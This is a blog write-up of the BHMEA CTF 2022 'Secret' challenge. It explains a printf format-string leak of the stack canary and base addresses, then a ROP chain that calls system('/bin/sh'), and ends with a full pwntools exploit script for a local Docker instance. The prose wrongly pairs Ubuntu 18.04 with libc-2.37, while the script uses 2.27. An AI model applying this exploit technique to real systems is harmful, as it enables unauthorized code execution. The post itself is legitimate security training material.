<!doctype html><html><meta charset=utf-8><meta name=generator content="Hugo 0.117.0"><meta name=viewport content="width=device-width,initial-scale=1,viewport-fit=cover"><meta name=color-scheme content="light dark"><meta name=supported-color-schemes content="light dark"><title>BHMEACTF22: Secret&nbsp;&ndash;&nbsp;The Mess Of Nebula</title><link rel=stylesheet href=/css/core.min.3dff9636f60da21a7bce297e09d08d8f636d1b8e7def5079c790207b0c0dfdc945858b105a0c7fc6c4a0b4f9ae05e8d3.css integrity=sha384-Pf+WNvYNohp7zil+CdCNj2NtG45971B5x5AgewwN/clFhYsQWgx/xsSgtPmuBejT><body><div class="base-body max-width"><section id=header class="header max-body-width"><div class=header-wrap><div class=header-left-side><a class=home href=/><span class=site-name>The Mess Of Nebula</span><span class=site-slogan>Gravitations towards point origin</span></a></div><div class=header-right-side><div class=nav-wrap><div class=nav><a class=site-tag href=/categories/>Categories</a><a class=site-tag href=/tags/>Tags</a><a class=site-tag href=/about>About</a></div></div></div></div></section><div id=content class="flex-body max-body-width"><section class=article-header><h1>BHMEACTF22: Secret</h1><p class=article-date>2022-10-06</p></section><article class=markdown-body><h4 id=for-the-birds>For the birds</h4><blockquote><p>I use pwntools for my scripting. While I will show snippets where relevant, I will share the full script at the end.</p><p>I will create a follow-up blog on ROP introduction and notify.</p></blockquote><hr><p><a target=_blank rel="noopener noreferrer" href=/images/sec_header.png><img class=img src=/images/sec_header.png alt></a></p><hr><h3 id=checksec>Checksec</h3><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl><span class=o>[</span>*<span class=o>]</span> <span class=s1>&#39;/home/levanto/Documents/Return-To-ROP/ChasingFlags/BlackHat/PWN/secret/main&#39;</span>
</span></span><span class=line><span class=cl>    Arch:     amd64-64-little
</span></span><span class=line><span class=cl>    RELRO:    Full RELRO
</span></span><span class=line><span class=cl>    Stack:    Canary found
</span></span><span class=line><span class=cl>    NX:       NX enabled
</span></span><span class=line><span class=cl>    PIE:      PIE enabled
</span></span></code></pre></div><p>There is a stack canary - which you have to get if you would need to overwrite a return address.</p><h3 id=rodata>Rodata</h3><div class=highlight><pre tabindex=0 class=chroma><code class=language-bash data-lang=bash><span class=line><span class=cl>Contents of section .rodata:
</span></span><span class=line><span class=cl> <span class=m>2000</span> <span class=m>01000200</span> <span class=m>00000000</span> 506c6561 <span class=m>73652066</span>  ........Please f
</span></span><span class=line><span class=cl> <span class=m>2010</span> 696c6c20 696e2079 6f757220 6e616d65  ill in your name
</span></span><span class=line><span class=cl> <span class=m>2020</span> 3a005468 616e6b20 796f7520 <span class=m>00000000</span>  :.Thank you ....
</span></span><span class=line><span class=cl> <span class=m>2030</span> 536f206c <span class=m>65742773</span> <span class=m>20676574</span> 20696e74  So let<span class=err>&#39;</span>s get int
</span></span><span class=line><span class=cl> <span class=m>2040</span> 6f206275 73696e65 73732c20 <span class=m>67697665</span>  o business, give
</span></span><span class=line><span class=cl> <span class=m>2050</span> 206d6520 <span class=m>61207365</span> <span class=m>63726574</span> 20746f20   me a secret to
</span></span><span class=line><span class=cl> <span class=m>2060</span> 6578706c 6f697420 6d65203a 292e0042  exploit me :<span class=o>)</span>..B
</span></span><span class=line><span class=cl> <span class=m>2070</span> 79652c20 676f6f64 206c7563 6b206e65  ye, good luck ne
</span></span><span class=line><span class=cl> <span class=m>2080</span> <span class=m>78742074</span> 696d6520 3a442000           xt <span class=nb>time</span> :D .
</span></span></code></pre></div><p>You can infer that there are two inputs from the user given by the strings at @offset 0x2008 and @offset 0x2030</p><hr><h3 id=interesting-functions-readelf---syms-main>Interesting functions (<code>readelf --syms main</code>)</h3><ul><li>main</li><li>get_name @offset 0x11e9</li></ul><h4 id=main-offset-0x1264><code>main @offset 0x1264</code></h4><blockquote><p>Calls a <code>get_name()</code> function; takes input and puts at rbp-0x40(top of the stack)</p></blockquote><pre tabindex=0><code>...
 ; calls to get_name(), no parameters
12c0:       e8 24 ff ff ff          call   11e9 &lt;get_name&gt;
12c5:       48 8d 3d 64 0d 00 00    lea    rdi,[rip+0xd64]      2030 -&gt; So let&#39;s get into business, give me a secret to exploit me :)
12cc:       e8 cf fd ff ff          call   10a0 &lt;puts@plt&gt;
 ; Gets user input with gets(rbp-0x40)
12d1:       48 8d 45 c0             lea    rax,[rbp-0x40]
12d5:       48 89 c7                mov    rdi,rax
12d8:       b8 00 00 00 00          mov    eax,0x0
12dd:       e8 fe fd ff ff          call   10e0 &lt;gets@plt&gt;
12e2:       48 8d 3d 86 0d 00 00    lea    rdi,[rip+0xd86]        # 206f &lt;_IO_stdin_used+0x6f&gt;
12e9:       e8 b2 fd ff ff          call   10a0 &lt;puts@plt&gt;
 ; stack canary check
1302:       e8 a9 fd ff ff          call   10b0 &lt;__stack_chk_fail@plt&gt;
1307:       c9                      leave
1308:       c3                      ret
1309:       0f 1f 80 00 00 00 00    nop    DWORD PTR [rax+0x0]
</code></pre><h4 id=get_name-offset-0x11e9><code>get_name @offset 0x11e9</code></h4><blockquote><p>Reads user input to rbp-0x30(top of the stack) and <code>printf()</code> it.</p></blockquote><pre tabindex=0><code> ; calls read(0, rbp-0x30, 0x1e)
1210:       48 8d 45 d0             lea    rax,[rbp-0x30]
1214:       ba 1e 00 00 00          mov    edx,0x1e
1219:       48 89 c6                mov    rsi,rax
121c:       bf 00 00 00 00          mov    edi,0x0
1221:       b8 00 00 00 00          mov    eax,0x0
1226:       e8 a5 fe ff ff          call   10d0 &lt;read@plt&gt;
 ; prints the input
123c:       48 8d 45 d0             lea    rax,[rbp-0x30]
1240:       48 89 c7                mov    rdi,rax
1243:       b8 00 00 00 00          mov    eax,0x0
1248:       e8 73 fe ff ff          call   10c0 &lt;printf@plt&gt;
 ; stack canary check
125d:       e8 4e fe ff ff          call   10b0 &lt;__stack_chk_fail@plt&gt;
1262:       c9                      leave
</code></pre><hr><h3 id=the-vulnerability>The vulnerability</h3><p><a target=_blank rel="noopener noreferrer" href=/images/printf.png><img class=img src=/images/printf.png alt></a></p><h4 id=gone-fishing-in-pondf>gone fishing in pondf</h4><ul><li><code>get_name</code> takes user input and displays to stdout using <code>printf()</code> without supplying a format string. A format string attack by passing format strings.</li></ul><p>The objective is to leak pointers from the stack - the format specifier <code>%p</code> will be useful here.</p><p><a target=_blank rel="noopener noreferrer" href=/images/format><img class=img src=/images/format alt></a></p><p><strong>What is important to leak:</strong></p><ul><li>the stack canary</li><li>the return address to main &lt;- Use this to get pie base(Where the program is loaded in memory)</li><li>the return address to __libc_start_main_ret &lt;- Use this to get libc base</li></ul><p>You have to find the position of our target leaks.</p><p>You are an eip inside get_name, this is how the program stack view looks like:</p><p><a target=_blank rel="noopener noreferrer" href=/images/stack_vis.png><img class=img src=/images/stack_vis.png alt></a></p><p>To effect the format string vulnerability, you need to remember you now inside the <code>printf</code> stack, the view looks like:</p><p><a target=_blank rel="noopener noreferrer" href=/images/stack_vis_print.png><img class=img src=/images/stack_vis_print.png alt></a></p><p>Our format specifier, &ldquo;formats&rdquo; 8 bytes of input(in this case stack juice). So the offsets are:</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-py data-lang=py><span class=line><span class=cl><span class=c1># printf stack = 0x28; input size = 0x10; get_name stack = 0x30; ret_addr_to_main = 0x8; main stack = 0x40; rbp = 0x8 </span>
</span></span><span class=line><span class=cl><span class=n>offset_to_canary</span> <span class=o>=</span> <span class=p>(</span><span class=mh>0x28</span> <span class=o>+</span> <span class=mh>0x10</span> <span class=o>+</span> <span class=mh>0x20</span><span class=p>)</span><span class=o>/</span><span class=mh>0x8</span> <span class=c1># 11</span>
</span></span><span class=line><span class=cl><span class=n>offset_to_ret_from_getname</span> <span class=o>=</span> <span class=p>(</span><span class=mh>0x28</span> <span class=o>+</span> <span class=mh>0x10</span> <span class=o>+</span> <span class=mh>0x30</span><span class=p>)</span><span class=o>/</span><span class=mh>0x8</span> <span class=c1># 13</span>
</span></span><span class=line><span class=cl><span class=n>offset_to_ret_from_main</span> <span class=o>=</span> <span class=p>(</span><span class=mh>0x28</span> <span class=o>+</span> <span class=mh>0x10</span> <span class=o>+</span> <span class=mh>0x30</span> <span class=o>+</span> <span class=mh>0x8</span> <span class=o>+</span> <span class=mh>0x40</span> <span class=o>+</span> <span class=mh>0x8</span><span class=p>)</span><span class=o>/</span><span class=mh>0x8</span> <span class=c1># 23</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># Let&#39;s send the first payload</span>
</span></span><span class=line><span class=cl><span class=n>io</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=s1>&#39;:&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>io</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>f</span><span class=s1>&#39;%</span><span class=si>{</span><span class=n>offset_to_canary</span><span class=si>}</span><span class=s1>$p.%</span><span class=si>{</span><span class=n>offset_to_ret_from_getname</span><span class=si>}</span><span class=s1>$p.%</span><span class=si>{</span><span class=n>offset_to_ret_from_main</span><span class=si>}</span><span class=s1>$p&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>response</span> <span class=o>=</span> <span class=n>io</span><span class=o>.</span><span class=n>recvline_contains</span><span class=p>(</span><span class=s1>&#39;0x&#39;</span><span class=p>)</span><span class=o>.</span><span class=n>decode</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>leaked_addrs</span> <span class=o>=</span> <span class=n>response</span><span class=o>.</span><span class=n>split</span><span class=p>(</span><span class=s2>&#34; &#34;</span><span class=p>)[</span><span class=o>-</span><span class=mi>1</span><span class=p>]</span><span class=o>.</span><span class=n>split</span><span class=p>(</span><span class=s2>&#34;.&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>canary</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>leaked_addrs</span><span class=p>[</span><span class=mi>0</span><span class=p>],</span> <span class=mi>16</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>ret_main_addr</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>leaked_addrs</span><span class=p>[</span><span class=mi>1</span><span class=p>],</span> <span class=mi>16</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>ret_libc_main_addr</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>leaked_addrs</span><span class=p>[</span><span class=mi>2</span><span class=p>],</span> <span class=mi>16</span><span class=p>)</span>
</span></span></code></pre></div><blockquote><p>Find resource on understanding format string vulnerability <a href=https://cs155.stanford.edu/papers/formatstring-1.2.pdf target=_blank>here</a></p><p>There is a rabbithole in printf you can satisfy <a href=https://www.maizure.org/projects/printf/ target=_blank>here</a> and <a href=https://gsec.hitb.org/materials/sg2018/WHITEPAPERS/FILE%20Structures%20-%20Another%20Binary%20Exploitation%20Technique%20-%20An-Jie%20Yang.pdf target=_blank>here</a></p></blockquote><h4 id=trying-to-catch-a-shell-_fish_>Trying to catch a shell <em>fish</em></h4><p>Goal: Call <code>system(/bin/sh)</code></p><p>How: Overwrite return address from main; pass &ldquo;/bin/sh&rdquo; string as parameter and call <code>system</code>; hopefully pop a shell somehow.</p><p><strong>Offsets!</strong>
You need to figure out, which libc is in the system your program is running.</p><p>Running <code>ldd main</code> shows you the shared dependencies of the program(dependent on the system you are running this on).</p><p>Locally:</p><p><a target=_blank rel="noopener noreferrer" href=/images/ldd.png><img class=img src=/images/ldd.png alt></a></p><p>Luckily, the challenge had a Dockerfile which throws a needed clue: the remote server is an ubuntu 18.04. Quick google search shows the libc version on ubuntu 18.04 is libc-2.37.so.</p><blockquote><p>Note, this still took me through some rabbitholes to get the correct libc-2.37 version.</p></blockquote><p>ooor, you could go the cooler route and use <a href=https://libc.rip/ target=_blank>libc-database</a></p><p>Mira! You leaked the <code>ret_to_libc_ret_main</code>, despite PIE, the last digits of the address are guaranteed to be static.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-py data-lang=py><span class=line><span class=cl><span class=n>ret_to_libc_ret_main</span> <span class=o>=</span> <span class=mh>0x7fd17fbbcc87</span> <span class=c1># Let&#39;s search for 0xc87</span>
</span></span></code></pre></div><p><a target=_blank rel="noopener noreferrer" href=/images/libc_db.png><img class=img src=/images/libc_db.png alt></a></p><p><strong>Let&rsquo;s build a ROP chain</strong></p><p>This ROP chain has to load the <code>bin_str</code> address to the rdi register(load as parameter), then call <code>system</code>.</p><p>Remember, <code>ret</code> is what progresses this chain, from one instruction to another, by returning execution to the stack(where this chain is).</p><p>Popping takes the value on the stack and loads it to the register specified. So, <code>pop rdi</code> will load the value on the stack(which you control) to rdi.</p><p><em>rop_chain = pop_rdi + ret + bin_sh_str_addr + system_addr</em></p><p>To get gadget:</p><p><a target=_blank rel="noopener noreferrer" href=/images/ropper.png><img class=img src=/images/ropper.png alt></a></p><div class=highlight><pre tabindex=0 class=chroma><code class=language-py data-lang=py><span class=line><span class=cl><span class=c1># target addresses</span>
</span></span><span class=line><span class=cl><span class=n>system_addr</span> <span class=o>=</span> <span class=n>p64</span><span class=p>(</span><span class=n>libc_base</span> <span class=o>+</span> <span class=mh>0x4f420</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>bin_str</span> <span class=o>=</span> <span class=n>p64</span><span class=p>(</span><span class=n>libc_base</span> <span class=o>+</span> <span class=mh>0x1b3d88</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># get gadgets</span>
</span></span><span class=line><span class=cl><span class=n>pop_rdi</span> <span class=o>=</span> <span class=n>p64</span><span class=p>(</span><span class=n>pie_base</span> <span class=o>+</span> <span class=mh>0x1373</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>=</span> <span class=sa>b</span><span class=s1>&#39;a&#39;</span> <span class=o>*</span> <span class=mi>56</span> <span class=c1># offset to the main function&#39;s canary</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>p64</span><span class=p>(</span><span class=n>canary</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=sa>b</span><span class=s1>&#39;a&#39;</span> <span class=o>*</span> <span class=mi>8</span> <span class=c1># pad for rbp</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>p64</span><span class=p>(</span><span class=n>pie_base</span> <span class=o>+</span> <span class=mh>0x101a</span><span class=p>)</span> <span class=c1># ret to re-align stack</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># pass param and call system</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>pop_rdi</span> <span class=o>+</span> <span class=n>bin_str</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>system_addr</span>
</span></span></code></pre></div><p>aaand:</p><p><a target=_blank rel="noopener noreferrer" href=/images/shell.png><img class=img src=/images/shell.png alt></a></p><h3 id=appendix>APPENDIX</h3><h4 id=setup>setup</h4><p>Wanna try out this challenge? Get files <a href="https://drive.google.com/drive/folders/1lwtwehwgJctEmG1khNyjBhReb_AL0xm1?usp=sharing" target=_blank>here</a></p><p>Instructions to set up remote env.:</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-sh data-lang=sh><span class=line><span class=cl>docker build -t secret &lt;path_to_directory_where_you_have_the_dockerfile&gt;
</span></span><span class=line><span class=cl>docker run -p 1337:1337 --name secret_ secret
</span></span></code></pre></div><p>Plus a docker <a href=https://dockerlabs.collabnix.com/docker/cheatsheet/ target=_blank>cheatsheet</a> for you ;)</p><p><code>remote("127.0.0.1", 1337)</code> and enjoy!</p><h4 id=script>script</h4><div class=highlight><pre tabindex=0 class=chroma><code class=language-py3 data-lang=py3><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>io</span> <span class=o>=</span> <span class=n>remote</span><span class=p>(</span><span class=s2>&#34;127.0.0.1&#34;</span><span class=p>,</span> <span class=mi>1337</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># binaries we are working with</span>
</span></span><span class=line><span class=cl><span class=n>e</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s1>&#39;main&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>libc</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;./libc-2.27.so&#34;</span><span class=p>)</span> <span class=c1># downloaded from libc.rip</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># ********************************************</span>
</span></span><span class=line><span class=cl><span class=c1># * Let&#39;s leak addresses that will enable us *</span>
</span></span><span class=line><span class=cl><span class=c1># * to get pie base and libc base .          *</span>
</span></span><span class=line><span class=cl><span class=c1># * We leak:                                 *</span>
</span></span><span class=line><span class=cl><span class=c1># *  - The stack canary                      *</span>
</span></span><span class=line><span class=cl><span class=c1># *  - The return address for get_name       *</span>
</span></span><span class=line><span class=cl><span class=c1># *  - The return address for main           *</span>
</span></span><span class=line><span class=cl><span class=c1># ********************************************</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># offset to addresses we want to leak</span>
</span></span><span class=line><span class=cl><span class=n>offset_to_canary</span> <span class=o>=</span> <span class=mi>11</span>
</span></span><span class=line><span class=cl><span class=n>offset_to_ret_from_getname</span> <span class=o>=</span> <span class=mi>13</span>
</span></span><span class=line><span class=cl><span class=n>offset_to_ret_from_main</span> <span class=o>=</span> <span class=mi>23</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># Let&#39;s send the first payload</span>
</span></span><span class=line><span class=cl><span class=n>io</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=s1>&#39;:&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>io</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=sa>f</span><span class=s1>&#39;%</span><span class=si>{</span><span class=n>offset_to_canary</span><span class=si>}</span><span class=s1>$p.%</span><span class=si>{</span><span class=n>offset_to_ret_from_getname</span><span class=si>}</span><span class=s1>$p.%</span><span class=si>{</span><span class=n>offset_to_ret_from_main</span><span class=si>}</span><span class=s1>$p&#39;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>response</span> <span class=o>=</span> <span class=n>io</span><span class=o>.</span><span class=n>recvline_contains</span><span class=p>(</span><span class=s1>&#39;0x&#39;</span><span class=p>)</span><span class=o>.</span><span class=n>decode</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>leaked_addrs</span> <span class=o>=</span> <span class=n>response</span><span class=o>.</span><span class=n>split</span><span class=p>(</span><span class=s2>&#34; &#34;</span><span class=p>)[</span><span class=o>-</span><span class=mi>1</span><span class=p>]</span><span class=o>.</span><span class=n>split</span><span class=p>(</span><span class=s2>&#34;.&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>canary</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>leaked_addrs</span><span class=p>[</span><span class=mi>0</span><span class=p>],</span> <span class=mi>16</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>ret_main_addr</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>leaked_addrs</span><span class=p>[</span><span class=mi>1</span><span class=p>],</span> <span class=mi>16</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>ret_libc_main_addr</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>leaked_addrs</span><span class=p>[</span><span class=mi>2</span><span class=p>],</span> <span class=mi>16</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># libc offsets</span>
</span></span><span class=line><span class=cl><span class=n>libc_start_main_ret_offset</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>libc_start_main_return</span>
</span></span><span class=line><span class=cl><span class=n>system_offset</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>symbols</span><span class=p>[</span><span class=s1>&#39;system&#39;</span><span class=p>]</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># offset to ret from get_name</span>
</span></span><span class=line><span class=cl><span class=n>ret_to_main_offset</span> <span class=o>=</span> <span class=mh>0x12c5</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># base addresses</span>
</span></span><span class=line><span class=cl><span class=n>libc_base</span> <span class=o>=</span> <span class=n>ret_libc_main_addr</span> <span class=o>-</span> <span class=n>libc_start_main_ret_offset</span>
</span></span><span class=line><span class=cl><span class=n>pie_base</span> <span class=o>=</span> <span class=n>ret_main_addr</span> <span class=o>-</span> <span class=n>ret_to_main_offset</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># ************************************************************</span>
</span></span><span class=line><span class=cl><span class=c1># * Now let us prepare our rop chain for the second payload. *</span>
</span></span><span class=line><span class=cl><span class=c1># * We want to:                                              *</span>
</span></span><span class=line><span class=cl><span class=c1># * - Write our command a writeable section in memory        *</span>
</span></span><span class=line><span class=cl><span class=c1># * - Pass address to written section and call system        *</span>
</span></span><span class=line><span class=cl><span class=c1># ************************************************************</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># target addresses</span>
</span></span><span class=line><span class=cl><span class=n>system_addr</span> <span class=o>=</span> <span class=n>p64</span><span class=p>(</span><span class=n>libc_base</span> <span class=o>+</span> <span class=n>system_offset</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>bin_str</span> <span class=o>=</span> <span class=n>p64</span><span class=p>(</span><span class=n>libc_base</span> <span class=o>+</span> <span class=mh>0x1b3d88</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># get gadgets</span>
</span></span><span class=line><span class=cl><span class=n>pop_rdi</span> <span class=o>=</span> <span class=n>p64</span><span class=p>(</span><span class=n>pie_base</span> <span class=o>+</span> <span class=mh>0x1373</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>=</span> <span class=sa>b</span><span class=s1>&#39;a&#39;</span> <span class=o>*</span> <span class=mi>56</span> <span class=c1># offset to the main function&#39;s ret address</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>p64</span><span class=p>(</span><span class=n>canary</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=sa>b</span><span class=s1>&#39;a&#39;</span> <span class=o>*</span> <span class=mi>8</span> <span class=c1># pad for rbp</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>p64</span><span class=p>(</span><span class=n>pie_base</span> <span class=o>+</span> <span class=mh>0x101a</span><span class=p>)</span> <span class=c1># ret to re-align stack</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># pass param and call system</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>pop_rdi</span> <span class=o>+</span> <span class=n>bin_str</span>
</span></span><span class=line><span class=cl><span class=n>rop_chain</span> <span class=o>+=</span> <span class=n>system_addr</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># send the second payload</span>
</span></span><span class=line><span class=cl><span class=n>io</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=s2>&#34;:).&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>io</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>rop_chain</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>io</span><span class=o>.</span><span class=n>interactive</span><span class=p>()</span>
</span></span></code></pre></div></article><section class=article-labels><a class="article-category li" href=/categories/reverse-engineering/><span class=hashtag>#</span>Reverse Engineering</a><a class="article-category li" href=/categories/ctf-writeups/><span class=hashtag>#</span>CTF Writeups</a><a class="article-tag li" href=/tags/bhmea/><span class=hashtag>#</span>bhmea</a><a class="article-tag li" href=/tags/format-specifiers/><span class=hashtag>#</span>format specifiers</a><a class="article-tag li" href=/tags/rop/><span class=hashtag>#</span>rop</a></section><section class=article-navigation><p><a class=link href=/posts/towards-oscp/><span class=li></span>Towards OSCP</a></p><p><a class=link href=/posts/namecheck/><span class=li></span>AHCTF2021: NameCheck</a class="link"></p></section><section class=article-discussion><div id=disqus_thread></div><script type=application/javascript>window.disqus_config=function(){},function(){if(["localhost","127.0.0.1"].indexOf(window.location.hostname)!=-1){document.getElementById("disqus_thread").innerHTML="Disqus comments not available by default when the website is previewed locally.";return}var t=document,e=t.createElement("script");e.async=!0,e.src="//the-mess-of-nebula.disqus.com/embed.js",e.setAttribute("data-timestamp",+new Date),(t.head||t.body).appendChild(e)}()</script><noscript>Please enable JavaScript to view the <a href=https://disqus.com/?ref_noscript>comments powered by Disqus.</a></noscript><a href=https://disqus.com class=dsq-brlink>comments powered by <span class=logo-disqus>Disqus</span></a></section></div><section id=footer class="footer max-body-width"><p>© 2023 Eva Levanto</p><p><span>Powered by </span><a href=https://gohugo.io>Hugo</a><span> and the </span><a href=https://themes.gohugo.io/hugo-notepadium/>Notepadium</a></p></section><script defer type=text/javascript src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.7/MathJax.js?config=TeX-AMS-MML_HTMLorMML" integrity=sha384-e/4/LvThKH1gwzXhdbY2AsjR3rm7LHWyhIG5C0jiRfn8AN2eTN5ILeztWw0H9jmN crossorigin=anonymous>MathJax.Hub.Config({tex2jax:{inlineMath:[["$","$"],["\\(","\\)"]],displayMath:[["$$","$$"]],processEscapes:!0,processEnvironments:!0,skipTags:["script","noscript","style","textarea","pre"],TeX:{equationNumbers:{autoNumber:"AMS"},extensions:["AMSmath.js","AMSsymbols.js"]}}}),MathJax.Hub.Queue(function(){var e,t=MathJax.Hub.getAllJax();for(e=0;e<t.length;e+=1)t[e].SourceElement().parentNode.className+=" has-jax"}),MathJax.Hub.Config({TeX:{equationNumbers:{autoNumber:"AMS"}}})</script><script type=application/javascript>var doNotTrack=!1;doNotTrack||(window.ga=window.ga||function(){(ga.q=ga.q||[]).push(arguments)},ga.l=+new Date,ga("create","your-google-analytics-id","auto"),ga("send","pageview"))</script><script async src=https://www.google-analytics.com/analytics.js></script></div></body></html>